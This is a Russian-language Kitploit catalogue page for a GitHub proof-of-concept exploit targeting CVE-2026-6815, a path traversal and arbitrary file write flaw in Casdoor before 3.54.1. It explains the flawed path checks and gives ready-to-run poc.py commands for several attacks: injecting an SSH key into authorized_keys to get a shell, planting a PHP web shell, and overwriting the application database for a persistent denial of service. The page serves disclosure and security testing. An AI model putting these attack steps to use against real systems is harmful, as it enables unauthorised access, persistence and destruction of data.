Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-6815 — Эксплойт PoC для аутентифицированного обхода пути и произвольной записи файлов в Casdoor <3.54.1, позволяющий выполнение произвольного кода (RCE) через внедрение SSH-ключа, загрузку веб-шелла или постоянный отказ в обслуживании (DoS) путём повреждения базы данных. | Kitploit
Инструменты/GitHubGitHub/danilo-dellorco/cve-2026-6815
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubdanilo-dellorco/cve-2026-6815

CVE-2026-6815

Эксплойт PoC для аутентифицированного обхода пути и произвольной записи файлов в Casdoor <3.54.1, позволяющий выполнение произвольного кода (RCE) через внедрение SSH-ключа, загрузку веб-шелла или постоянный отказ в обслуживании (DoS) путём повреждения базы данных.

Репозиторий
2103 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-6815 PoC/эксплойт: Casdoor <3.54.1 Path Traversal и произвольная запись файлов (с аутентификацией)

Этот репозиторий содержит эксплойт Proof of Concept (PoC) для CVE-2026-6815 — уязвимости произвольной записи файлов и обхода пути (path traversal) в Casdoor.

Уязвимость была исправлена в версии 3.54.1.

Требования

Атакующий должен быть аутентифицирован в экземпляре Casdoor с правами администратора или быть пользователем с эквивалентными правами, имеющим доступ к созданию и/или редактированию провайдеров хранилища.

Воздействие

  • Удалённое выполнение кода (RCE): запись в чувствительные места, такие как .ssh/authorized_keys, crontab или корневые каталоги веб-сервера.
  • Отказ в обслуживании (DoS): перезапись баз данных приложения (casdoor.db) или основных бинарных файлов произвольными файлами, что немедленно останавливает приложение.

Технические подробности

Casdoor позволяет администраторам настраивать провайдеров хранилища. Провайдер Local File System не выполняет надлежащую санитизацию конфигурации pathPrefix и параметра fullFilePath при загрузке ресурсов.

Используя последовательности обхода каталога (../), аутентифицированный администратор может выйти за пределы выделенного каталога хранилища и записывать файлы в любые места, куда у процесса Casdoor есть права доступа.

Уязвимость обусловлена недостаточной проверкой пути в:

  • object/provider.go: отсутствие проверки pathPrefix при создании/обновлении.
  • storage/local_file_system.go: метод GetFullPath не проверяет, остаётся ли разрешённый путь в пределах предполагаемой песочницы.

Использование

  1. Установите зависимости:

    pip install -r requirements.txt
    
  2. Запустите эксплойт:

    python3 poc.py --url http://target:8000 --file local_file --rpath /home/casdoor/new_remote_file
    

Примеры использования

1. Внедрение SSH-ключа для RCE

Запишите управляемый атакующим открытый ключ в файл authorized_keys пользователя casdoor для получения SSH-доступа.

Сгенерируйте ssh-ключ:

ssh-keygen -f casdoor_rce

Перезапишите authorized_keys сгенерированным открытым ключом:

python3 poc.py --url http://target:8000 --usr admin --psw 123 --file casdoor_rce.pub --rpath /home/casdoor/.ssh/authorized_keys

Получите ssh-оболочку на удалённом хосте с помощью закрытого ключа:

ssh -i ./casdoor_rce casdoor@target

2. Постоянный DoS (повреждение базы данных)

Перезапишите локальный файл базы данных приложения (например, casdoor.db), чтобы вызвать отказ в обслуживании.

python3 poc.py --url http://target:8000 --usr admin --psw 123 --file dummy.txt --rpath /app/casdoor.db

3. Загрузка веб-шелла (вторичный веб-корень)

Если на сервере работает дополнительный веб-сервер (например, Apache/Nginx) в той же файловой системе, запишите веб-шелл в его корневой каталог документов.

python3 poc.py --url http://target:8000 --usr admin --psw 123 --file shell.php --rpath /var/www/html/shell.php

4. Пользовательские организация и приложение

Если у вас есть учётные данные администратора для конкретной организации и приложения (отличных от стандартных built-in и app-built-in), укажите их с помощью --orgname и --appname.

python3 poc.py --url http://target:8000 --usr custom_admin --psw P@ssw0rd --orgname my-org --appname my-app --file local_file.txt --rpath /tmp/pwned.txt

Ссылки

  • CERT/CC Vulnerability Note VU#937808
  • CVE-2026-6815 on CVE.org
  • Red Hat Security Advisory: CVE-2026-6815

Отказ от ответственности

Данное программное обеспечение предназначено только для образовательных целей и авторизованного тестирования безопасности. Автор не несёт ответственности за любое неправомерное использование этой информации.

Автор

Уязвимость обнаружена и PoC разработан Danilo Dell'Orco (sixpain).

Скачать инструмент